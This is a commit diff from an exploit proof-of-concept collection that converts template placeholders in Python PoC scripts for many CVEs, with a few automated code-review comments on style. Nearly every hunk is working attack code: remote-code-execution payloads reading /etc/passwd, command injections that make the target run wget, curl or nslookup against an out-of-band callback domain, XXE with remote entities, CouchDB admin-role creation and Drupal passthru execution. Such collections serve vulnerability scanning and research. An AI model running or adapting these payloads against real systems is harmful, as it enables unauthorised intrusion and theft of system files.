add pocsploit pocs
cckuailong committed Mar 19, 2022
1 parent ba76e6b commit 42a5133
Showing 93 changed files with 472 additions and 304 deletions.
6 changes: 4 additions & 2 deletions 2010/CVE-2010-0219/poc/pocsploit/CVE-2010-0219.py
Expand Up @@ -33,18 +33,20 @@ def fingerprint(url):
# Proof of Concept
def poc(url):
result = {}
username = "amdin"
password = ""
try:
url = format_url(url)

path = """/axis2-admin/login"""
method = "POST"
data = """loginUsername={{username}}&loginPassword={{password}}"""
data = """loginUsername={username}&loginPassword={password}""".format(username=username, password=password)
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)

path = """/axis2/axis2-admin/login"""
method = "POST"
data = """userName={{username}}&password={{password}}&submit=+Login+"""
data = """userName={username}&password={password}&submit=+Login+""".format(username=username, password=password)
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
resp1 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)

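Review bot: The new `username`/`password` assignments at the top of `poc` are hard-coded values with no comment saying what they represent, so a reader cannot tell whether the later check is expected to mean anything against an instance that uses different settings. A one-line comment such as `# credentials the PoC assumes on the lab target` would make the assumption explicit. The same undocumented hard-coding appears in `username = "admin"` in 2016/CVE-2016-10033 and in `username`/`password` in 2018/CVE-2018-7602. `poc` continues past the end of this hunk.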
33 changes: 17 additions & 16 deletions 2014/CVE-2014-3120/poc/pocsploit/CVE-2014-3120.py
@@ -1,4 +1,5 @@
import requests
import re


# Vuln Base Info
Expand Down Expand Up @@ -39,24 +40,24 @@ def poc(url):

path = """/_search?pretty"""
method = "POST"
data = """{
"size": 1,
"query": {
"filtered": {
"query": {
"match_all": {
}
data = {
"size": 1,
"query": {
"filtered": {
"query": {
"match_all": {
}
}
}
},
"script_fields": {
"command": {
"script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\"cat /etc/passwd\").getInputStream()).useDelimiter(\"\\\\A\").next();"
}
}
}
}
},
"script_fields": {
"command": {
"script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\"cat /etc/passwd\").getInputStream()).useDelimiter(\"\\\\A\").next();"
}
}
}"""
headers = {'Accept': '*/*', 'Accept-Language': 'en', 'Content-Type': 'application/x-www-form-urlencoded'}
resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
resp0 = requests.request(method=method,url=url+path,json=data,headers=headers,timeout=10,verify=False,allow_redirects=False)

if ("""application/json""" in str(resp0.headers)) and (re.search(r"""root:.*:0:0""",resp0.text)) and (resp0.status_code == 200):
result["success"] = True
4 changes: 2 additions & 2 deletions 2014/CVE-2014-3206/poc/pocsploit/CVE-2014-3206.py
Expand Up @@ -40,13 +40,13 @@ def poc(url):

oob_domain,flag = gen_oob_domain()

path = """/backupmgt/localJob.php?session=fail;wget http://oob_domain;"""
path = """/backupmgt/localJob.php?session=fail;wget http://{oob_domain};""".format(oob_domain=oob_domain)
method = "GET"
data = """"""
headers = {'Accept': '*/*'}
resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)

path = """/backupmgt/pre_connect_check.php?auth_name=fail;wget http://oob_domain;"""
path = """/backupmgt/pre_connect_check.php?auth_name=fail;wget http://{oob_domain};""".format(oob_domain=oob_domain)
method = "GET"
data = """"""
headers = {'Accept': '*/*'}
1 change: 1 addition & 0 deletions 2015/CVE-2015-1427/poc/pocsploit/CVE-2015-1427.py
@@ -1,4 +1,5 @@
import requests
import re


# Vuln Base Info
3 changes: 2 additions & 1 deletion 2016/CVE-2016-10033/poc/pocsploit/CVE-2016-10033.py
Expand Up @@ -32,6 +32,7 @@ def fingerprint(url):
# Proof of Concept
def poc(url):
result = {}
username = "admin"
try:
url = format_url(url)

Expand All @@ -43,7 +44,7 @@ def poc(url):

path = """/wp-login.php?action=lostpassword"""
method = "POST"
data = """wp-submit=Get+New+Password&redirect_to=&user_login={{username}}"""
data = """wp-submit=Get+New+Password&redirect_to=&user_login={username}""".format(username=username)
headers = {'Accept': '*/*', 'Content-Type': 'application/x-www-form-urlencoded'}
resp1 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)

3 changes: 1 addition & 2 deletions 2016/CVE-2016-10940/poc/pocsploit/CVE-2016-10940.py
Expand Up @@ -20,8 +20,7 @@ def info():
"cwe-id": "CWE-89"
},
"metadata":{
"vuln-target": "",

"vuln-target": "https://github.com/cckuailong/reapoc/tree/main/2016/CVE-2016-10940/vultarget"
},
"tags": ["cve", "cve2016", "sqli", "wp", "wordpress", "wp-plugin", "authenticated"],
}
4 changes: 2 additions & 2 deletions 2017/CVE-2017-10271/poc/pocsploit/CVE-2017-10271.py
Expand Up @@ -58,15 +58,15 @@ def poc(url):
<string>-c</string>
</void>
<void index="2">
<string>nslookup oob_domain</string>
<string>nslookup {oob_domain}</string>
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>"""
</soapenv:Envelope>""".format(oob_domain=oob_domain)
headers = {'Accept': '*/*', 'Accept-Language': 'en', 'Content-Type': 'text/xml'}
resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)

4 changes: 2 additions & 2 deletions 2017/CVE-2017-11610/poc/pocsploit/CVE-2017-11610.py
Expand Up @@ -46,10 +46,10 @@ def poc(url):
<methodName>supervisor.supervisord.options.warnings.linecache.os.system</methodName>
<params>
<param>
<string>nslookup oob_domain</string>
<string>nslookup {oob_domain}</string>
</param>
</params>
</methodCall>"""
</methodCall>""".format(oob_domain=oob_domain)
headers = {'Accept': 'text/xml', 'Content-type': 'text/xml'}
resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)

2 changes: 1 addition & 1 deletion 2017/CVE-2017-12629/poc/pocsploit/CVE-2017-12629.py
Expand Up @@ -48,7 +48,7 @@ def poc(url):
headers = {}
resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)

path = """/solr/{{core}}/select?q=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%0A%3C!DOCTYPE%20root%20%5B%0A%3C!ENTITY%20%25%20remote%20SYSTEM%20%22https%3A%2F%2Foob_domain%2F%22%3E%0A%25remote%3B%5D%3E%0A%3Croot%2F%3E&wt=xml&defType=xmlparser"""
path = """/solr/{{core}}/select?q=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%0A%3C!DOCTYPE%20root%20%5B%0A%3C!ENTITY%20%25%20remote%20SYSTEM%20%22https%3A%2F%2F{oob_domain}%2F%22%3E%0A%25remote%3B%5D%3E%0A%3Croot%2F%3E&wt=xml&defType=xmlparser""".format(oob_domain=oob_domain)
method = "GET"
data = """"""
headers = {}
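Review bot: On the new `path` line the `.format(oob_domain=oob_domain)` call turns the doubled braces `{{core}}` into a literal `{core}` in the request path, and nothing in this hunk substitutes it, so the leftover template placeholder now reads like a finished value. Either document it on the line — `# {{core}} is intentionally left as a literal placeholder; .format() only fills oob_domain` — or fill it from a variable the same way `oob_domain` is. The same leftover `{{core}}` is in the `path` line of 2019/CVE-2019-0193. `poc` continues outside this hunk.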
16 changes: 8 additions & 8 deletions 2017/CVE-2017-12635/poc/pocsploit/CVE-2017-12635.py
Expand Up @@ -37,15 +37,15 @@ def poc(url):

path = """/_users/org.couchdb.user:poc"""
method = "PUT"
data = """{
"type": "user",
"name": "poc",
"roles": ["_admin"],
"roles": [],
"password": "123456"
}"""
data = {
"type": "user",
"name": "poc",
"roles": ["_admin"],
"roles": [],
"password": "123456"
}
headers = {'Accept': 'application/json'}
resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
resp0 = requests.request(method=method,url=url+path,json=data,headers=headers,timeout=10,verify=False,allow_redirects=False)

if ("""application/json""" in str(resp0.headers) and """""" in str(resp0.headers)) and ("""org.couchdb.user:poc""" in resp0.text and """conflict""" in resp0.text and """Document update conflict""" in resp0.text) and (resp0.status_code == 201 or resp0.status_code == 409):
result["success"] = True
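Review bot: The new dict literal assigns the key `"roles"` twice; a Python dict keeps only the last value, so the `"roles": ["_admin"]` line is dead code in this form and ruff F601 will flag it. Either drop the dead line or add a comment stating why it is kept so the next reader does not silently "fix" it. The success check just below also still contains `"""""" in str(resp0.headers)`, which is always true and can be removed. `poc` continues outside this hunk.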
2 changes: 1 addition & 1 deletion 2017/CVE-2017-14135/poc/pocsploit/CVE-2017-14135.py
Expand Up @@ -41,7 +41,7 @@ def poc(url):

oob_domain,flag = gen_oob_domain()

path = """/webadmin/script?command=|%20nslookup%20oob_domain"""
path = """/webadmin/script?command=|%20nslookup%20{oob_domain}""".format(oob_domain=oob_domain)
method = "GET"
data = """"""
headers = {}
4 changes: 2 additions & 2 deletions 2017/CVE-2017-3506/poc/pocsploit/CVE-2017-3506.py
Expand Up @@ -47,7 +47,7 @@ def poc(url):
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8" class="java.beans.XMLDecoder">
<void id="url" class="java.net.URL">
<string>http://oob_domain</string>
<string>http://{oob_domain}</string>
</void>
<void idref="url">
<void id="stream" method ="openStream"/>
Expand All @@ -56,7 +56,7 @@ def poc(url):
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>"""
</soapenv:Envelope>""".format(oob_domain=oob_domain)
headers = {'Content-Type': 'text/xml;charset=UTF-8', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8,'}
resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)

2 changes: 1 addition & 1 deletion 2017/CVE-2017-9506/poc/pocsploit/CVE-2017-9506.py
Expand Up @@ -41,7 +41,7 @@ def poc(url):

oob_domain,flag = gen_oob_domain()

path = """/plugins/servlet/oauth/users/icon-uri?consumerUri=http://oob_domain"""
path = """/plugins/servlet/oauth/users/icon-uri?consumerUri=http://{oob_domain}""".format(oob_domain=oob_domain)
method = "GET"
data = """"""
headers = {}
4 changes: 2 additions & 2 deletions 2018/CVE-2018-10818/poc/pocsploit/CVE-2018-10818.py
Expand Up @@ -42,13 +42,13 @@ def poc(url):

path = """/system/sharedir.php"""
method = "POST"
data = """&uid=10; wget http://oob_domain"""
data = """&uid=10; wget http://{oob_domain}""".format(oob_domain=oob_domain)
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)

path = """/en/php/usb_sync.php"""
method = "POST"
data = """&act=sync&task_number=1;wget http://oob_domain"""
data = """&act=sync&task_number=1;wget http://{oob_domain}""".format(oob_domain=oob_domain)
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
resp1 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)

2 changes: 1 addition & 1 deletion 2018/CVE-2018-16167/poc/pocsploit/CVE-2018-16167.py
Expand Up @@ -42,7 +42,7 @@ def poc(url):

path = """/upload"""
method = "POST"
data = """logtype=XML&timezone=1%3Bwget+http%3A%2F%2Foob_domain%3B"""
data = """logtype=XML&timezone=1%3Bwget+http%3A%2F%2F{oob_domain}%3B""".format(oob_domain=oob_domain)
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)

2 changes: 1 addition & 1 deletion 2018/CVE-2018-7600/poc/pocsploit/CVE-2018-7600.py
Expand Up @@ -56,7 +56,7 @@ def poc(url):
user_register_form
-----------------------------99533888113153068481322586663
Content-Disposition: form-data; name="_drupal_ajax"'''
headers = {'Accept': 'application/json', 'Referer': ' {{Hostname}}/user/register', 'X-Requested-With': 'XMLHttpRequest', 'Content-Type': 'multipart/form-data; boundary=---------------------------99533888113153068481322586663'}
headers = {'Accept': 'application/json', 'Referer': '%s/user/register' % url, 'X-Requested-With': 'XMLHttpRequest', 'Content-Type': 'multipart/form-data; boundary=---------------------------99533888113153068481322586663'}
resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)

if ("""application/json""" in str(resp0.headers)) and (re.search(r"""root:.*:0:0""",resp0.text)) and (resp0.status_code == 200):
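Review bot: The rewritten `Referer` header uses `'%s/user/register' % url` while every other substitution introduced by this commit uses `str.format`; for consistency write `'Referer': '{}/user/register'.format(url)`. The header value also now depends on whatever `format_url` did to `url` earlier in `poc` (not shown here), which is worth a short comment if a trailing slash or scheme matters. `poc` starts and ends outside this hunk.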
36 changes: 27 additions & 9 deletions 2018/CVE-2018-7602/poc/pocsploit/CVE-2018-7602.py
@@ -1,4 +1,6 @@
import requests
import re
from urllib import parse


# Vuln Base Info
Expand All @@ -19,8 +21,7 @@ def info():
"cwe-id": ""
},
"metadata":{
"vuln-target": "",

"vuln-target": "https://github.com/cckuailong/reapoc/tree/main/2018/CVE-2018-7602/vultarget"
},
"tags": ["cve", "cve2018", "drupal", "authenticated"],
}
Expand All @@ -33,34 +34,51 @@ def fingerprint(url):
# Proof of Concept
def poc(url):
result = {}
username = "drupal"
password = "drupal"
try:
url = format_url(url)

s = requests.Session()

path = """/?q=user%2Flogin"""
method = "POST"
data = """form_id=user_login&name={{username}}&pass={{password}}&op=Log+in"""
data = """form_id=user_login&name={username}&pass={password}&op=Log+in""".format(username=username, password=password)
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
resp0 = s.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
tmp = re.search(r'<meta about="([/a-z0-9]+)" property="foaf', resp0.text)
if tmp:
userid = parse.quote(tmp.group())
else:
return result

path = """/?q={{url_encode("{{userid}}")}}%2Fcancel"""
path = """/?q={userid}%2Fcancel""".format(userid=userid)
method = "GET"
data = """"""
headers = {}
resp1 = s.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
tmp = re.search(r'<input type="hidden" name="form_token" value="(.*)" />', resp1.text)
if tmp:
form_token = tmp.group()
else:
return result

path = """/?q={{url_encode("{{userid}}")}}%2Fcancel&destination={{url_encode("{{userid}}")}}%2Fcancel%3Fq%5B%2523post_render%5D%5B%5D%3Dpassthru%26q%5B%2523type%5D%3Dmarkup%26q%5B%2523markup%5D%3Decho+COP-2067-8102-EVC+|+rev"""
path = """/?q={userid}%2Fcancel&destination={userid}%2Fcancel%3Fq%5B%2523post_render%5D%5B%5D%3Dpassthru%26q%5B%2523type%5D%3Dmarkup%26q%5B%2523markup%5D%3Decho+COP-2067-8102-EVC+|+rev""".format(userid=userid)
method = "POST"
data = """form_id=user_cancel_confirm_form&form_token={{form_token}}&_triggering_element_name=form_id&op=Cancel+account"""
data = """form_id=user_cancel_confirm_form&form_token={form_token}&_triggering_element_name=form_id&op=Cancel+account""".format(form_token=form_token)
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
resp2 = s.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
tmp = re.search(r'<input type="hidden" name="form_build_id" value="(.*)" />', resp1.text)
if tmp:
form_build_id = tmp.group()
else:
return result

path = """/?q=file%2Fajax%2Factions%2Fcancel%2F%23options%2Fpath%2F{{form_build_id}}"""
path = """/?q=file%2Fajax%2Factions%2Fcancel%2F%23options%2Fpath%2F{form_build_id}""".format(form_build_id=form_build_id)
method = "POST"
data = """form_build_id={{form_build_id}}"""
data = """form_build_id={form_build_id}""".format(form_build_id=form_build_id)
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
resp3 = s.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
resp3 = s.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=True)

if ("""CVE-2018-7602-POC""" in resp3.text):
result["success"] = True
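Review bot: The final request, `resp3 = s.request(..., allow_redirects=True)`, is the only request in this file and in the rest of the commit that follows redirects, and the reason is not recorded; add a comment stating it, for example `# follow redirects: the marker is looked for in the final page body` if that is the intent. The three new `if tmp: ... else: return result` branches return the empty `result` dict with no `"success"` key, which is presumably what callers expect via `result.get("success")`, but that contract should be stated in a docstring on `poc`. The function body continues past the end of this hunk.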
2 changes: 1 addition & 1 deletion 2019/CVE-2019-0193/poc/pocsploit/CVE-2019-0193.py
Expand Up @@ -49,7 +49,7 @@ def poc(url):

path = """/solr/{{core}}/dataimport?indent=on&wt=json"""
method = "POST"
data = """command=full-import&verbose=false&clean=false&commit=true&debug=true&core=test&dataConfig=%3CdataConfig%3E%0A++%3CdataSource+type%3D%22URLDataSource%22%2F%3E%0A++%3Cscript%3E%3C!%5BCDATA%5B%0A++++++++++function+poc()%7B+java.lang.Runtime.getRuntime().exec(%22curl%20http://oob_domain%22)%3B%0A++++++++++%7D%0A++%5D%5D%3E%3C%2Fscript%3E%0A++%3Cdocument%3E%0A++++%3Centity+name%3D%22stackoverflow%22%0A++++++++++++url%3D%22https%3A%2F%2Fstackoverflow.com%2Ffeeds%2Ftag%2Fsolr%22%0A++++++++++++processor%3D%22XPathEntityProcessor%22%0A++++++++++++forEach%3D%22%2Ffeed%22%0A++++++++++++transformer%3D%22script%3Apoc%22+%2F%3E%0A++%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E&name=dataimport"""
data = """command=full-import&verbose=false&clean=false&commit=true&debug=true&core=test&dataConfig=%3CdataConfig%3E%0A++%3CdataSource+type%3D%22URLDataSource%22%2F%3E%0A++%3Cscript%3E%3C!%5BCDATA%5B%0A++++++++++function+poc()%7B+java.lang.Runtime.getRuntime().exec(%22curl%20http://{oob_domain}%22)%3B%0A++++++++++%7D%0A++%5D%5D%3E%3C%2Fscript%3E%0A++%3Cdocument%3E%0A++++%3Centity+name%3D%22stackoverflow%22%0A++++++++++++url%3D%22https%3A%2F%2Fstackoverflow.com%2Ffeeds%2Ftag%2Fsolr%22%0A++++++++++++processor%3D%22XPathEntityProcessor%22%0A++++++++++++forEach%3D%22%2Ffeed%22%0A++++++++++++transformer%3D%22script%3Apoc%22+%2F%3E%0A++%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E&name=dataimport""".format(oob_domain=oob_domain)
headers = {'Content-type': 'application/x-www-form-urlencoded', 'X-Requested-With': 'XMLHttpRequest'}
resp1 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)

2 changes: 1 addition & 1 deletion 2019/CVE-2019-10758/poc/pocsploit/CVE-2019-10758.py
Expand Up @@ -42,7 +42,7 @@ def poc(url):

path = """/checkValid"""
method = "POST"
data = """document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("curl http://oob_domain")"""
data = """document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("curl http://{oob_domain}")""".format(oob_domain=oob_domain)
headers = {'Authorization': 'Basic YWRtaW46cGFzcw==', 'Content-Type': 'application/x-www-form-urlencoded'}
resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
